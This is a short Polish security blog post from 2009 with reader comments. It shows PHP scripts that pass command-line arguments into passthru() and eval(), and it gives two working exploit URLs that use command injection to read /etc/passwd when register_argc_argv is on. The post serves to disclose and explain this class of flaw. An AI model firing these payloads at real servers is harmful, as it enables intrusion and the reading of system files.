Skrypty CLI w DocumentRoot

[17-03-2009]

W Google Code Search można znaleźć sporo aplikacji i bibliotek PHP zawierających kod podobny do poniższych przykładów:

http://lukasz.pilorz.net/testy/argv/passthru.phps

<?php
passthru('echo '.$_SERVER['argv'][1]);
?>

http://lukasz.pilorz.net/testy/argv/eval.phps

<?php
eval('echo "'.$_SERVER['argv'][1].'";');
?>

Jeśli włączona jest dyrektywa register_argc_argv, a skrypt znajduje się w DocumentRoot, można go wykorzystać na przykład tak:

http://lukasz.pilorz.net/testy/argv/passthru.php?+|{cat,/etc/passwd}

http://lukasz.pilorz.net/testy/argv/eval.php?x={cat,/etc/passwd}&+{${passthru($_GET[x])}}

Komentarze

1. carstein | 17 mar 2009 17:20

   Już myślałem, że przestałeś pisać. Wracasz?

2. Michał "Bełdzio" Ławicki | 17 mar 2009 23:30

   Witaj wśród żywych :-) tęskniliśmy ;-)

   B.

3. lpilorz | 19 mar 2009 09:40

   Czasem coś skrobnę ;)

4. carstein | 20 mar 2009 12:10

   Mam nadzieję, że wystarczająco często, żebym znowu nie zapomniał, że mam cię w RSS-ach. :)

Leave a Comment

Name (required)

Mail (will not be published) (required)

Website